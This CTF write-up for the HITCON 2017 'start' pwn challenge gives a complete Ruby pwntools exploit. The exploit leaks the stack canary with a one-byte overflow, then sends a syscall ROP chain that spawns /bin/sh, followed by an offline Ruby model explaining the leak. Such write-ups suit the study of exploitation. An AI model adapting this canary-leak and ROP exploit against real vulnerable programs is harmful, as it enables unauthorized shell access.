2017. 11. 22. 00:24
## HITCON CTF_2017(start, pwn)
[Summary]
1. A challenge that uses the Ruby pwntools module, which plays the same role as the Python pwntools module.
=> https://github.com/peter50216/pwntools-ruby
2. server.rb is run, and it executes Ruby code through the eval() function.
3. The start binary has a simple BOF vulnerability and is statically compiled.
=> So a syscall-based ROP chain is enough.
4. Since there is a canary, overwriting 0x18 bytes and having the buffer printed makes a canary leak possible.
[Exploit Code] - start_exploit.rb
```ruby
# encoding: ASCII-8BIT
# The encoding line is important most time, or you'll get "\u0000" when using "\x00" in code,
# which is NOT what we want when doing pwn...
require 'pwn'

context.arch = 'amd64'
#context.log_level = :debug

z = Sock.new 'localhost', 31337

# Addresses from the statically linked binary: a writable .bss slot for "/bin/sh"
# and the gadgets used to load the syscall registers.
bss = 0x6cdb80
syscall_gadget = 0x468e75
pop_raxrdxrbx = 0x47a6e6
pop_rsi = 0x4017f7
pop_rdi = 0x4005d5

# 0x18 bytes fill the buffer; the 25th byte replaces the canary's NUL low byte
# so the output that follows does not stop at the canary.
canary_leak_payload = 'A'*(0x19)

# Stage 1 : canary leak
z.send canary_leak_payload
z.recv 0x18
canary = u64(z.recv 0x8) - 0x41   # undo the 'A' (0x41) that replaced the low byte
log.info "[+] canary : #{canary.hex}"

# Stage 2 : read(0, bss, 8) & execve(bss, 0x0, 0x0) => bss:"/bin/sh"
rop_payload = 'A'*0x18 + p64(canary) + "ebppebpp"   # buffer, canary, saved rbp (any value)
# read(0, bss, 8): rax = 0 (SYS_read), rdi = 0, rsi = bss, rdx = 8
rop_payload += p64(pop_rdi) + p64(0x0) + p64(pop_rsi) + p64(bss)
rop_payload += p64(pop_raxrdxrbx) + p64(0x0) + p64(0x8) + p64(0x0)
rop_payload += p64(syscall_gadget)
# execve(bss, 0, 0): rax = 59 (SYS_execve), rdi = bss, rsi = 0, rdx = 0
rop_payload += p64(pop_rdi) + p64(bss)
rop_payload += p64(pop_rsi) + p64(0x0)
rop_payload += p64(pop_raxrdxrbx) + p64(59) + p64(0x0) + p64(0x0)
rop_payload += p64(syscall_gadget)
z.send rop_payload
z.send "exit" + "\x0a"     # ends the input so the function returns into the chain
z.send "/bin/sh"+"\x00"    # consumed by read(0, bss, 8)

# Switch to interactive mode
z.interact
```
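The stage-1 arithmetic is the part worth understanding: a glibc stack canary keeps its lowest byte at 0x00 precisely so that string-style output stops at the canary, and a 0x19-byte overflow defeats that by replacing the NUL with 'A'. The following plain-Ruby model is an added example, not the author's exploit; it assumes the writeup's layout (a 0x18-byte buffer directly followed by the canary) and an echo that prints the buffer as a C string, and it replaces the pwntools-ruby p64/u64 with Array#pack so it runs offline.

```ruby
# Added example (not from the writeup): models the stage-1 canary leak.
# Little-endian 64-bit pack/unpack, the same as pwntools' p64 / u64.
def p64(n)
  [n].pack('Q<')
end

def u64(s)
  s.unpack1('Q<')
end

BUF_SIZE = 0x18  # assumed layout: 0x18-byte buffer, then the 8-byte canary

# Constructed stack frame. glibc canaries keep the low byte 0x00 so that
# strcpy/printf-style operations stop at the canary instead of leaking it.
def make_frame(canary)
  raise 'canary low byte must be 0' unless (canary & 0xff) == 0
  ('B' * BUF_SIZE).b + p64(canary)
end

# Model of the vulnerable read: copies input over the frame without a bounds check.
def overflow(frame, input)
  rest = frame.byteslice(input.bytesize, frame.bytesize) || ''.b
  (input.b + rest).byteslice(0, frame.bytesize)
end

# Model of the echo: prints the buffer as a C string, i.e. up to the first NUL.
def echo(frame)
  nul = frame.index("\x00".b)
  nul ? frame.byteslice(0, nul) : frame
end

# Run the leak with a given overflow length; returns the recovered canary,
# or nil when the canary's NUL byte stopped the echo early.
def leak_canary(canary, overflow_len)
  out = echo(overflow(make_frame(canary), 'A' * overflow_len))
  return nil if out.bytesize < BUF_SIZE + 8
  u64(out.byteslice(BUF_SIZE, 8)) - 0x41   # undo the 'A' that replaced the NUL
end

if __FILE__ == $PROGRAM_NAME
  sample = 0x1122334455667700   # constructed canary value
  p leak_canary(sample, 0x18)   # nil: echo stops at the canary's NUL byte
  p leak_canary(sample, 0x19)   # 0x1122334455667700: one extra byte leaks it
end
```

With 0x18 bytes the echo stops at the canary's NUL byte and nothing leaks; with 0x19 the low byte is 'A', the full frame is echoed, and subtracting 0x41 restores the original value.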